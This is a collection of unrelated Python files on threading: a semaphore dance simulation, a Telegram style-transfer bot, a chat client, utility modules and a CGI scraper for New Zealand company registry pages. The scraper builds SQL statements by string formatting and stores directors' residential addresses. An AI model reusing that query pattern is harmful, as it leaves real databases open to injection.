if(len(followers_on_floor) != 0):
can_dance = True
lid = leaders_on_floor.popleft()
leader_wait[lid].release()
mutex.release()
#mutex.acquire()
can_enter = False
can_dance = False
#print ("stop")
#mutex.release()
while len(followers_line) != F or len(leaders_line) != L: #wait for everyone; also mark that no one can enter during this time
if (len(leaders_on_floor) == 0 and len(followers_on_floor) != 0):
if(can_enter == False):
mutex.acquire()
can_dance = False
fid = followers_on_floor.popleft()
follower_wait[fid].release()
mutex.release()
if (len(leaders_on_floor) != 0 and len(followers_on_floor) == 0):
if(can_enter == False):
can_dance = False
if(len(leaders_on_floor)!=0):
mutex.acquire()
lid = leaders_on_floor.popleft()
leader_wait[lid].release()
mutex.release()
pass
# It's guaranteed that at this point, there is no one on the floor.
end_music(music)
init = False #set init to false after 1st time
#--------------------------------
#------players-------------------
def leader():
global can_dance
global can_enter
while True:
if(can_enter == True):
mutex.acquire()
lid = leaders_line.popleft()
#print ("Leader ",lid," leftline")
print ("Leader ",lid," entering floor")
leaders_on_floor.append(lid)
mutex.release()
leader_wait[lid].acquire()
if(can_dance == True):
mutex.acquire()
fid = followers_on_floor.popleft() #appears that append and popleft are thread safe. might not need this sema for protection...
print("Leader ",lid," and Follower ",fid," are dancing.")
follower_wait[fid].release()
mutex.release()
# if not returned due to poor luck, then dance
sleep(rng.random())
#-------
mutex.acquire()
print ("Leader ",lid," getting back in line.")
leaders_line.append(lid)
mutex.release()
def follower():
global can_enter
global followers_on_floor
global mutex
global rng
while True:
if (can_enter == True):
mutex.acquire()
fid = followers_line.popleft()
#print ("Follower ",fid," leftline")
print ("Follower ",fid," entering floor")
followers_on_floor.append(fid)
#print ("Follower ",fid," entered floor")
mutex.release()
follower_wait[fid].acquire()
if (can_dance == True):# if not returned due to poor luck, then dance
sleep(rng.random())
#-------
mutex.acquire()
print ("Follower ",fid," getting back in line.")
followers_line.append(fid)
mutex.release()
#--------------------------------
if __name__ == '__main__':
#everyone enters the ballroom
#init all leaders and followers
#no one can dance unless music starts
#Like a formal dance
#where music will not start until everyone has entered the ballroom
init_band = Thread(target = band_leader)
init_band.start()
for i in range(0,L):
lead = Thread(target=leader)
lead.start()
for i in range(0,F):
follow = Thread(target=follower)
follow.start()
init_band.join()
lead.join()
follow.join()
#start first music for everyone to dance
|
python_threads.py
|
#!/usr/bin/env python
import time
import threading
def ticker():
while 42:
print("Tick!")
time.sleep(1)
thread = threading.Thread(target=ticker)
thread.daemon = True
thread.start()
# Or using subclassing:
class TickerThread(threading.Thread):
def run(self):
while 42:
print("Tick!")
time.sleep(1)
thread = TickerThread()
thread.start()
# ...
thread.join()
|
bot.py
|
import os, time
import logging
import threading
from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, Update
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext, ConversationHandler
from PIL import Image, ImageOps
from dataclasses import dataclass
from methods import gan, nst
PORT = int(os.environ.get('PORT', 5000))
MODE, PHOTO, NST, GAN, GAN_STYLE = range(5)
# Tokens are stored on Heroku: HerokuApp -> Settings -> Config Vars
TOKEN = os.environ.get('TG_TOKEN')
HEROKU_URL = os.environ.get('HEROKU_URL')
# Enable logging
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO
)
logger = logging.getLogger(__name__)
content_files = {} #dictionary of content files: userId -> file_name
listOfTasks = []
os.makedirs("outputs", exist_ok = True)
os.makedirs("inputs", exist_ok = True)
@dataclass
class StyleTask:
method: str
target: str
style: str
update: Update
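# Note: `style` is overloaded - for NST tasks it holds the path of the
# uploaded style photo, for GAN tasks the chosen preset name (e.g. 'CUPHEAD').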
def help(update: Update, context: CallbackContext):
update.message.reply_text(
'PhotoBot can restyle photos with the help of neural networks.\n'
'Two methods are implemented: NST and GAN.\n'
'Use the /start command to begin working\n'
'and the /cancel command to finish\n',
reply_markup = ReplyKeyboardRemove())
return
def start(update: Update, context: CallbackContext) -> int:
update.message.reply_text(
'Hi! I am PhotoBot. I can change the style of photos.\n'
'To get started, send me the photo you want to change.',
reply_markup = ReplyKeyboardRemove())
return PHOTO
def photo_content(update: Update, context: CallbackContext) -> int:
photo_file = update.message.photo[-1].get_file()
content_filename = f'inputs/{str(photo_file["file_unique_id"])}.jpg'
photo_file.download(content_filename)
content_files[update.message.chat_id] = content_filename # remember the file tied to this user
reply_keyboard = [['NST', 'GAN']]
update.message.reply_text(
'So, we have the content photo! '
'How shall we transfer the style: NST or GAN?',
reply_markup = ReplyKeyboardMarkup(reply_keyboard))
return MODE
def mode(update: Update, context: CallbackContext) -> int:
if(update.message.text == 'NEW'):
update.message.reply_text(
'OK! Send me a new content photo',
reply_markup = ReplyKeyboardRemove())
return PHOTO
if(update.message.text == 'GAN'):
styles_keyboard = [['CUPHEAD', 'STARRY NIGHT', 'MOSAIC']]
update.message.reply_text(
'Great! Next we need to choose one of the three styles: ',
reply_markup = ReplyKeyboardMarkup(styles_keyboard))
return GAN
if(update.message.text == 'NST'):
update.message.reply_text(
'Super! Then I also need a style image...\n'
'Send one more photo to copy the style from',
reply_markup = ReplyKeyboardRemove(),
)
return NST
def run_style_transfer(update: Update, context: CallbackContext) -> int:
photo_file = update.message.photo[-1].get_file()
style_filename = f'inputs/{str(photo_file["file_unique_id"])}.jpg'
photo_file.download(style_filename)
update.message.reply_text(
'Great style, I think the result will be interesting.\n'
'But NST is not the fastest method - you will have to wait a bit...')
listOfTasks.append(StyleTask("NST", content_files[update.message.chat_id], style_filename, update))
print('NST added task')
return show_task_added(update, len(listOfTasks))
def run_GAN_transfer(update: Update, context: CallbackContext) -> int:
update.message.reply_text(
f'Accepted for processing, applying the {update.message.text} style',
reply_markup = ReplyKeyboardRemove())
listOfTasks.append(StyleTask("GAN", content_files[update.message.chat_id], update.message.text, update))
print('GAN added task')
return show_task_added(update, len(listOfTasks))
def send_result(update: Update, result_file, task_title):
update.message.reply_text(f'Task {task_title} is done!')
update.message.reply_photo(photo = open(result_file, "rb"))
update.message.reply_text('Gorgeous, right?!\n')
def show_task_added(update, num) -> int:
update.message.reply_text(f'The task was added to the queue as number {num}\n'
'I will send you the result when it is ready')
modes_keyboard = [['NST', 'GAN'],['NEW']]
update.message.reply_text(
'We can add more tasks! What shall we do next?\n'
'Keep "tormenting" this photo? (Choose NST or GAN...)\n'
'Or try another picture? (Press NEW...) ',
reply_markup = ReplyKeyboardMarkup(modes_keyboard))
return MODE
def cancel(update: Update, context: CallbackContext) -> int:
user = update.message.from_user
logger.info("User %s canceled the conversation.", user.first_name)
update.message.reply_text(
'Bye! If you get bored, come again...', reply_markup=ReplyKeyboardRemove())
return ConversationHandler.END
def run_tasks(queue):
while True:
if len(queue) > 0:
print('task found')
task = queue[0] #.pop(0)
if task.method == "GAN":
print('do gan')
styled_file = gan.apply_style(task.target, task.style)
else:
print('do nst')
styled_file = nst.transfer_style(task.target, task.style)
queue.pop(0)
send_result(task.update, styled_file, f'{task.method} ({task.style})')
else:
print('waiting for task')
time.sleep(1 if len(queue) > 0 else 10)
def main() -> None:
# Create the Updater and pass it your bot's token.
updater = Updater(TOKEN)
# Get the dispatcher to register handlers
dispatcher = updater.dispatcher
# Add conversation handler with the states MODE, PHOTO
conv_handler = ConversationHandler(
entry_points=[CommandHandler('start', start), CommandHandler('help', help)],
states = {
MODE: [MessageHandler(Filters.regex('^(NST|GAN|NEW)$'), mode)],
PHOTO: [MessageHandler(Filters.photo, photo_content)],
NST: [MessageHandler(Filters.photo, run_style_transfer)],
GAN: [MessageHandler(Filters.regex('^(CUPHEAD|STARRY NIGHT|MOSAIC)$'), run_GAN_transfer)]
},
fallbacks=[CommandHandler('cancel', cancel)],
)
dispatcher.add_handler(conv_handler)
updater.start_webhook(listen="0.0.0.0",
port=int(PORT),
url_path=TOKEN)
updater.bot.set_webhook(HEROKU_URL + TOKEN)
updater.idle()
if __name__ == '__main__':
threading.Thread(target=run_tasks, args = (listOfTasks,), daemon = True).start()
main()
|
client_console.py
|
import socket, threading
class Client():
def __init__(self):
self.cli_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.thread_send = threading.Thread(target = self.send)
self.thread_receive = threading.Thread(target = self.receive)
def StartClient(self):
HOST = 'localhost'
PORT = 5023
self.cli_sock.connect((HOST, PORT))
print('Connected to remote host...')
uname = input('Enter your name to enter the chat > ')
uname = uname.encode("UTF-8").strip()
self.cli_sock.send(uname)
self.thread_send.start()
self.thread_receive.start()
def send(self):
while True:
msg =input('\nMe: \n')
self.cli_sock.send(msg.encode("UTF-8").strip())
def receive(self):
while True:
sen_name = self.cli_sock.recv(1024).decode("UTF-8").strip()
data = self.cli_sock.recv(1024).decode("UTF-8").strip()
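# NB: this assumes the server delivers the sender's name and the message
# as two separate sends; on a plain TCP stream they can coalesce, so a
# robust client would add explicit message framing.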
print('\n' + str(sen_name) + ' > ' + str(data)+'\n')
print("Me:")
if __name__ == "__main__":
client = Client()
client.StartClient()
|
multipor.py
|
# multiprocessing is available on Windows and macOS as well, but process
# start-up behaves differently there than on Linux (spawn instead of fork)
import multiprocessing
import time
start = time.perf_counter() # relative time (reference point is arbitrary, often system boot)
print(start)
def do_something():
print('start sleep')
time.sleep(1)
print('sleeping for 1s')
# pass the function itself, not its result: target=do_something() would run
# the function here in the parent and hand Process a target of None
p1 = multiprocessing.Process(target=do_something)
p2 = multiprocessing.Process(target=do_something)
p1.start()
p2.start()
p1.join()
p2.join()
# do_something()
# do_something()
# do_something()
finish = time.perf_counter() # relative time (same arbitrary reference as above)
print(f'finished executing, elapsed time: {round(finish - start, 2)}s')
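# Note: under the "spawn" start method (the default on Windows and macOS),
# Process creation must sit behind a main guard, e.g.:
#
# if __name__ == '__main__':
#     p1 = multiprocessing.Process(target=do_something)
#     p1.start()
#     p1.join()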
|
util.py
|
# -*- coding: utf-8 -*-
import random
import re
import string
import sys
import threading
import traceback
import warnings
import functools
import six
from six import string_types
# Python3 queue support.
try:
import Queue
except ImportError:
import queue as Queue
import logging
try:
import PIL
from io import BytesIO
pil_imported = True
except:
pil_imported = False
logger = logging.getLogger('TeleBot')
thread_local = threading.local()
class WorkerThread(threading.Thread):
count = 0
def __init__(self, exception_callback=None, queue=None, name=None):
if not name:
name = "WorkerThread{0}".format(self.__class__.count + 1)
self.__class__.count += 1
if not queue:
queue = Queue.Queue()
threading.Thread.__init__(self, name=name)
self.queue = queue
self.daemon = True
self.received_task_event = threading.Event()
self.done_event = threading.Event()
self.exception_event = threading.Event()
self.continue_event = threading.Event()
self.exception_callback = exception_callback
self.exc_info = None
self._running = True
self.start()
def run(self):
while self._running:
try:
task, args, kwargs = self.queue.get(block=True, timeout=.5)
self.continue_event.clear()
self.received_task_event.clear()
self.done_event.clear()
self.exception_event.clear()
logger.debug("Received task")
self.received_task_event.set()
task(*args, **kwargs)
logger.debug("Task complete")
self.done_event.set()
except Queue.Empty:
pass
except Exception as e:
logger.error(type(e).__name__ + " occurred, args=" + str(e.args) + "\n" + traceback.format_exc())
self.exc_info = sys.exc_info()
self.exception_event.set()
if self.exception_callback:
self.exception_callback(self, self.exc_info)
self.continue_event.wait()
def put(self, task, *args, **kwargs):
self.queue.put((task, args, kwargs))
def raise_exceptions(self):
if self.exception_event.is_set():
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def clear_exceptions(self):
self.exception_event.clear()
self.continue_event.set()
def stop(self):
self._running = False
class ThreadPool:
def __init__(self, num_threads=2):
self.tasks = Queue.Queue()
self.workers = [WorkerThread(self.on_exception, self.tasks) for _ in range(num_threads)]
self.num_threads = num_threads
self.exception_event = threading.Event()
self.exc_info = None
def put(self, func, *args, **kwargs):
self.tasks.put((func, args, kwargs))
def on_exception(self, worker_thread, exc_info):
self.exc_info = exc_info
self.exception_event.set()
worker_thread.continue_event.set()
def raise_exceptions(self):
if self.exception_event.is_set():
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def clear_exceptions(self):
self.exception_event.clear()
def close(self):
for worker in self.workers:
worker.stop()
for worker in self.workers:
worker.join()
class AsyncTask:
def __init__(self, target, *args, **kwargs):
self.target = target
self.args = args
self.kwargs = kwargs
self.done = False
self.thread = threading.Thread(target=self._run)
self.thread.start()
def _run(self):
try:
self.result = self.target(*self.args, **self.kwargs)
except:
self.result = sys.exc_info()
self.done = True
def wait(self):
if not self.done:
self.thread.join()
# on failure _run stores sys.exc_info(), a 3-tuple, so detect that here;
# the old isinstance(self.result, BaseException) check could never match
if isinstance(self.result, tuple) and len(self.result) == 3 and isinstance(self.result[1], BaseException):
six.reraise(self.result[0], self.result[1], self.result[2])
else:
return self.result
def async_dec():
def decorator(fn):
def wrapper(*args, **kwargs):
return AsyncTask(fn, *args, **kwargs)
return wrapper
return decorator
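# Usage sketch (illustrative):
# @async_dec()
# def slow_add(a, b):
#     return a + b
# task = slow_add(1, 2) # returns an AsyncTask immediately
# print(task.wait()) # blocks until the worker thread finishes -> 3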
def is_string(var):
return isinstance(var, string_types)
def is_dict(var):
return isinstance(var, dict)
def is_bytes(var):
return isinstance(var, bytes)
def is_pil_image(var):
return pil_imported and isinstance(var, PIL.Image.Image)
def pil_image_to_file(image, extension='JPEG', quality='web_low'):
if pil_imported:
photoBuffer = BytesIO()
image.convert('RGB').save(photoBuffer, extension, quality=quality)
photoBuffer.seek(0)
return photoBuffer
else:
raise RuntimeError('PIL module is not imported')
def is_command(text):
"""
Checks if `text` is a command. Telegram chat commands start with the '/' character.
:param text: Text to check.
:return: True if `text` is a command, else False.
"""
if (text is None): return None
return text.startswith('/')
def extract_command(text):
"""
Extracts the command from `text` (minus the '/') if `text` is a command (see is_command).
If `text` is not a command, this function returns None.
Examples:
extract_command('/help'): 'help'
extract_command('/help@BotName'): 'help'
extract_command('/search black eyed peas'): 'search'
extract_command('Good day to you'): None
:param text: String to extract the command from
:return: the command if `text` is a command (according to is_command), else None.
"""
if (text is None): return None
return text.split()[0].split('@')[0][1:] if is_command(text) else None
def split_string(text, chars_per_string):
"""
Splits one string into multiple strings, with a maximum amount of `chars_per_string` characters per string.
This is very useful for splitting one giant message into multiples.
:param text: The text to split
:param chars_per_string: The number of characters per line the text is split into.
:return: The split text as a list of strings.
"""
return [text[i:i + chars_per_string] for i in range(0, len(text), chars_per_string)]
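# e.g. split_string('abcdef', 4) -> ['abcd', 'ef']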
# CREDITS TO http://stackoverflow.com/questions/12317940#answer-12320352
def or_set(self):
self._set()
self.changed()
def or_clear(self):
self._clear()
self.changed()
def orify(e, changed_callback):
e._set = e.set
e._clear = e.clear
e.changed = changed_callback
e.set = lambda: or_set(e)
e.clear = lambda: or_clear(e)
def OrEvent(*events):
or_event = threading.Event()
def changed():
bools = [e.is_set() for e in events]
if any(bools):
or_event.set()
else:
or_event.clear()
def busy_wait():
while not or_event.is_set():
or_event._wait(3)
for e in events:
orify(e, changed)
or_event._wait = or_event.wait
or_event.wait = busy_wait
changed()
return or_event
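# Usage sketch (illustrative):
# e1, e2 = threading.Event(), threading.Event()
# either = OrEvent(e1, e2)
# e2.set() # either.is_set() becomes True
# either.wait() # returns promptly once any underlying event is set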
def extract_arguments(text):
"""
Returns the argument after the command.
Examples:
extract_arguments("/get name"): 'name'
extract_arguments("/get"): ''
extract_arguments("/get@botName name"): 'name'
:param text: String to extract the arguments from a command
:return: the arguments if `text` is a command (according to is_command), else None.
"""
regexp = re.compile(r"/\w*(@\w*)*\s*([\s\S]*)",re.IGNORECASE)
result = regexp.match(text)
return result.group(2) if is_command(text) else None
def per_thread(key, construct_value, reset=False):
if reset or not hasattr(thread_local, key):
value = construct_value()
setattr(thread_local, key, value)
return getattr(thread_local, key)
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
# https://stackoverflow.com/a/312464/9935473
for i in range(0, len(lst), n):
yield lst[i:i + n]
def generate_random_token():
return ''.join(random.sample(string.ascii_letters, 16))
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used."""
# https://stackoverflow.com/a/30253848/441814
@functools.wraps(func)
def new_func(*args, **kwargs):
warnings.simplefilter('always', DeprecationWarning) # turn off filter
warnings.warn("Call to deprecated function {}.".format(func.__name__),
category=DeprecationWarning,
stacklevel=2)
warnings.simplefilter('default', DeprecationWarning) # reset filter
return func(*args, **kwargs)
return new_func
|
index.py
|
#!/usr/bin/pypy3
#!/usr/bin/python3
import mysql.connector
import json
import cgi
from urllib.request import Request, urlopen
from datetime import datetime, timedelta
from threading import Thread
def commit(company_number, output, cursor, cnx):
# Commit to database
sql1 = "DELETE FROM nzcompaniesoffice WHERE company_number={};".format(company_number)
sql2 = "INSERT INTO nzcompaniesoffice VALUES({}, '{}', '{}');".format(company_number, output, str(datetime.now()))
cursor.execute(sql1)
cnx.commit()
cursor.execute(sql2)
cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def worker(html, string):
index = html.find(string)
if index == -1:
raise Exception('index not found:{}'.format(string))
return index + len(string)
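# e.g. worker('<div id="maincol">x', 'id="maincol"') returns the index just
# past the marker, so html[worker(html, s):] keeps everything after s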
def site(company_number):
#url = 'http://10.0.0.10/removed.html'
#url = 'https://projectapi.co.nz/demo.html'
url = 'https://app.companiesoffice.govt.nz/companies/app/ui/pages/companies/{}/detail?backurl=%2Fcompanies%2Fapp%2Fui%2Fpages%2Fcompanies%2F6842293'.format(company_number)
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
webpage = urlopen(req).read()
html = webpage.decode('utf-8').replace('\r', '').replace('\n', '')
# maincol
maincol = html[worker(html, 'id="maincol"'):]
# Categories
panel1 = maincol[worker(maincol, 'class="pageContainer"'):]
panel2 = panel1[worker(panel1, 'class="pageContainer"'):]
panel3 = panel2[worker(panel2, 'class="pageContainer"'):]
panel4 = panel3[worker(panel3, 'class="pageContainer"'):]
panel5 = panel4[worker(panel4, 'class="pageContainer"'):]
panel6 = panel5[worker(panel5, 'class="pageContainer"'):]
panel7 = panel6[worker(panel6, 'class="pageContainer"'):]
panel7 = panel7[worker(panel7, 'class="pageContainer"'):]
panel1 = panel1[:worker(panel1, 'class="pageContainer"')]
panel2 = panel2[:worker(panel2, 'class="pageContainer"')]
panel3 = panel3[:worker(panel3, 'class="pageContainer"')]
panel4 = panel4[:worker(panel4, 'class="pageContainer"')]
panel5 = panel5[:worker(panel5, 'class="pageContainer"')]
panel6 = panel6[:worker(panel6, panel7)]
# Company Summary
_name = maincol[:worker(maincol, '<span class="entityIdentifier">')-len('<span class="entityIdentifier">')][::-1]
_name = _name[:worker(_name, '>')-len('>')][::-1].strip()
_nzbn = panel1[worker(panel1, 'for="nzbn">NZBN:</label>'):]
_nzbn = int(_nzbn[:worker(_nzbn, '</div>')-len('</div>')].strip())
_company_number = panel1[worker(panel1, 'for="companyNumber">Company number:</label>'):]
_company_number = int(_company_number[:worker(_company_number, '</div>')-len('</div>')].strip())
_incorporation_date = panel1[worker(panel1, 'for="incorporationDate">Incorporation Date:</label>'):]
_incorporation_date = _incorporation_date[:worker(_incorporation_date, '</div>')-len('</div>')].strip()
_company_status = panel1[worker(panel1, 'for="companyStatus">Company Status:</label>'):]
_company_status = _company_status[:worker(_company_status, '</div>')-len('</div>')].strip()
_entity_type = panel1[worker(panel1, 'for="entityType">Entity type:</label>'):]
_entity_type = _entity_type[:worker(_entity_type, '</div>')-len('</div>')].strip()
_constitution_filed = panel1[worker(panel1, 'for="constitutionFiled">Constitution filed:</label>'):]
_constitution_filed = _constitution_filed[:worker(_constitution_filed, '</div>')-len('</div>')].strip()
_constitution_filed = 'Yes' if 'Yes' in _constitution_filed else 'No'
try:
_ar_filing_month = panel1[worker(panel1, 'for="arFilingMonth">AR filing month:</label>'):]
_ar_filing_month = _ar_filing_month[:worker(_ar_filing_month, '<')-len('<')].split()[0].strip()
except:
_ar_filing_month = None
_ultimate_holding_company = panel1[worker(panel1, '<label id="ultimateHoldingCompany">Ultimate holding company'):].strip()
_ultimate_holding_company = _ultimate_holding_company[worker(_ultimate_holding_company, '</label>')+len('</label>'):].strip()
_ultimate_holding_company = _ultimate_holding_company[:worker(_ultimate_holding_company, '<')-len('<')].strip()
company_summary = {
'company_number':_company_number,
'nzbn':_nzbn,
'incorporation_date':_incorporation_date,
'company_status':_company_status,
'entity_type':_entity_type,
'constitution_filed':_constitution_filed,
'ar_filing_month':_ar_filing_month,
'ultimate_holding_company':_ultimate_holding_company,
'url':url.split('?')[0],
'date_retrieved':str(datetime.now().date())
}
# Company Directors
directors = []
while True:
try:
panel2 = panel2[worker(panel2, 'for="fullName">Full legal name:</label>'):]
_full_legal_name = panel2[:worker(panel2, '</div>')-len('</div>')].strip()
panel2 = panel2[worker(panel2, 'for="residentialAddress">Residential Address:</label>'):]
_residential_address = panel2[:worker(panel2, '</div>')-len('</div>')].strip()
panel2 = panel2[worker(panel2, 'for="appointmentDate">Appointment Date:</label>'):]
_appointed_date = panel2[:worker(panel2, '</div>')-len('</div>')].strip()
directors.append({
'full_legal_name':_full_legal_name,
'residential_address':_residential_address,
'appointed_date':_appointed_date
})
except:
break
# Company Shareholdings
panel3 = panel3[worker(panel3, '<label>Total Number of Shares:</label><span>'):]
_total_number_of_shares = int(panel3[:worker(panel3, '</span>')-len('</span>')].strip())
panel3 = panel3[worker(panel3, '<label>Extensive Shareholding:</label>'):]
_extensive_shareholding = 'Yes' if 'yes' in panel3[:worker(panel3, '</span>')-len('</span>')].strip() else 'no'
shareholdings = {
'total_number_of_shares':_total_number_of_shares,
'extensive_shareholding':_extensive_shareholding,
'allocation':[]
}
_shareholders = []
while True:
try:
panel3 = panel3[worker(panel3, '</span>:</label>'):]
_shareholders.append(panel3[:worker(panel3, '</span>:</label>')-len('</span>:</label>')])
except:
_shareholders.append(panel3)
break
for shareholder in _shareholders:
_shares = int(shareholder[:worker(shareholder, '<')-len('<')].strip())
_holders = []
while True:
try:
temp = shareholder[worker(shareholder, '<div class="labelValue col2">'):]
shareholder = temp[worker(temp, '<div class="labelValue col2">'):]
temp = temp[:worker(temp, '</div>')-len('</div>')].strip()
if temp[:2] == '<a':
temp = temp[worker(temp, '>'):]
temp = temp[:worker(temp, '</a>')-len('</a>')].strip()
_holders.append([
temp,
shareholder[:worker(shareholder, '</div>')-len('</div>')].strip()
])
except:
break
shareholdings['allocation'].append([_shares, _holders])
# Company Addresses
panel4 = panel4[worker(panel4, '<div class="addressLine">'):]
_registered_office_address = panel4[:worker(panel4, '</div>')-len('</div>')].strip()
panel4 = panel4[worker(panel4, '<div class="addressLine">'):]
_address_for_service = panel4[:worker(panel4, '</div>')-len('</div>')].strip()
try:
_website = maincol[worker(maincol, 'var website="'):]
_website = _website[:worker(_website, '"')-len('"')]
except:
_website = None
addresses = {
'registered_office_address':_registered_office_address,
'address_for_service':_address_for_service,
'website':_website
}
# Company PPSR
ppsr = {}
# Company NZBN (additional nzbn information)
try:
_industry = panel1[worker(panel1, 'for="businessClassification">Industry Classification(s):</label>'):]
_industry = _industry[worker(_industry, '<div>'):]
_industry = ' '.join(_industry[:worker(_industry, '</div>')-len('</div>')].strip().split(' ')[1:])
except:
_industry = ''
try:
_gst_number = panel6[worker(panel6, 'for="gstNumber">GST Number(s):</label>'):]
_gst_number = _gst_number[worker(_gst_number, 'class="nzbnDetails">'):]
_gst_number = _gst_number[:worker(_gst_number, '<')-len('<')].strip()
except:
_gst_number = ''
try:
_website = panel6[worker(panel6, 'for="website">Website(s):</label>'):]
if worker(_website, '<a href="') > worker(_website, '</div>'):
raise Exception('No data')
_website = _website[worker(_website, '<a href="'):]
_website = _website[:worker(_website, '"')-len('"')].strip()
except:
_website = ''
try:
_phone_number = panel6[worker(panel6, 'for="phone">Phone Number(s):</label>'):]
_phone_number = _phone_number[worker(_phone_number, '>'):]
_phone_number = _phone_number[:worker(_phone_number, '<')-len('<')].strip()
except:
_phone_number = ''
try:
_email_address = panel6[worker(panel6, 'for="email">Email Address(es):</label>'):]
if worker(_email_address, '<a href="') > worker(_email_address, '</div>'):
raise Exception('No data')
_email_address = _email_address[worker(_email_address, '<a href="'):]
_email_address = _email_address[:worker(_email_address, '<')-len('<')].strip().split(':')[1]
except:
_email_address = ''
try:
_trading_name = panel6[worker(panel6, 'for="tradingName">Trading Name(s):</label>'):]
_trading_name = _trading_name[worker(_trading_name, 'class="nzbnDetails">'):]
_trading_name = _trading_name[:worker(_trading_name, '<')-len('<')].strip()
except:
_trading_name = ''
try:
_trading_area = panel6[worker(panel6, 'for="tradingAreas">Trading Area(s):</label>'):]
_trading_area = _trading_area[worker(_trading_area, 'class="nzbnDetails">'):]
_trading_area = _trading_area[:worker(_trading_area, '<')-len('<')].strip()
except:
_trading_area = ''
try:
_abn = panel6[worker(panel6, 'for="ABNNumber">Australian Business Number (ABN):</label>'):]
_abn = _abn[worker(_abn, 'class="nzbnDetails">'):]
_abn = _abn[:worker(_abn, '<')-len('<')].strip()
except:
_abn = ''
nzbn = {
'gst_number':_gst_number if len(_gst_number)!=0 else 'Not Listed',
'website':_website if len(_website)!=0 else 'Not Listed',
'phone_number':_phone_number if len(_phone_number)!=0 else 'Not Listed',
        'email_address':_email_address if len(_email_address)!=0 else 'Not Listed',
'trading_name':_trading_name if len(_trading_name)!=0 else 'Not Listed',
'trading_area':_trading_area if len(_trading_area)!=0 else 'Not Listed',
'industry':_industry if len(_industry)!=0 else 'Not Listed',
'abn':_abn if len(_abn)!=0 else 'Not Listed'
}
# Company Documents
documents = {}
# Output
output = {
'NAME':_name,
'INFO':{
'SUMMARY':company_summary,
'DIRECTORS':directors,
'SHAREHOLDINGS':shareholdings,
'ADDRESSES':addresses,
'PPSR':ppsr,
'NZBN':nzbn,
'DOCUMENTS':documents
},
'DATE':company_summary['date_retrieved']
}
return json.dumps(output)
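# Editor's sketch (an assumption, not part of the original script): the
# slicing arithmetic throughout site() only works if the `worker` helper
# defined earlier in this file behaves like the stand-in below, i.e. it
# returns the index just past the first occurrence of the needle. Under
# that contract, s[worker(s, n):] is "everything after n" and
# s[:worker(s, n) - len(n)] is "everything before n".
def _worker_contract_sketch(haystack, needle):
    # illustrative only; deliberately named differently so it cannot
    # shadow the real worker()
    return haystack.index(needle) + len(needle)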
def main():
form = cgi.FieldStorage()
try:
try:
company_number = int(form['company_number'].value)
except KeyError:
            return json.dumps({'error':'missing parameter'})
except ValueError:
        return json.dumps({'error':'Invalid company number: {}'.format(form['company_number'].value)})
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM nzcompaniesoffice WHERE company_number={};".format(company_number)
cursor.execute(sql)
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
        data = list(cursor.fetchall()[0])
        # keep the cached copy even if it has expired, so it can serve as a
        # stale fallback below when the fresh fetch fails
        cache_results = data[1]
        if (datetime.now()-timedelta(days=30)) > data[2]:
            raise IndexError('item in database expired')
cursor.close()
cnx.close()
except IndexError:
cache_expired = True
try:
fetch_results = site(company_number)
except:
fetch_results = json.dumps({'error':'removed'})
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(company_number, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == "__main__":
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
email.py
|
# -*- coding: utf-8 -*-
__author__ = 'Pylar'
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
    msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
                  sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
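# Usage sketch (hedged; the names below are illustrative, not from this
# module). Assumes a Flask app configured with FLASKY_MAIL_SUBJECT_PREFIX
# and FLASKY_MAIL_SENDER, plus templates mail/welcome.txt and
# mail/welcome.html:
#
#   thr = send_email('user@example.com', 'Welcome', 'mail/welcome', user=user)
#   thr.join()  # optional: block until the message is handed to the server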
|
sh.py
|
"""
http://amoffat.github.io/sh/
"""
#===============================================================================
# Copyright (C) 2011-2015 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#===============================================================================
__version__ = "1.11"
__project_url__ = "https://github.com/amoffat/sh"
import platform
if "windows" in platform.system().lower():
raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
import sys
IS_PY3 = sys.version_info[0] == 3
import traceback
import os
import re
from glob import glob as original_glob
import time
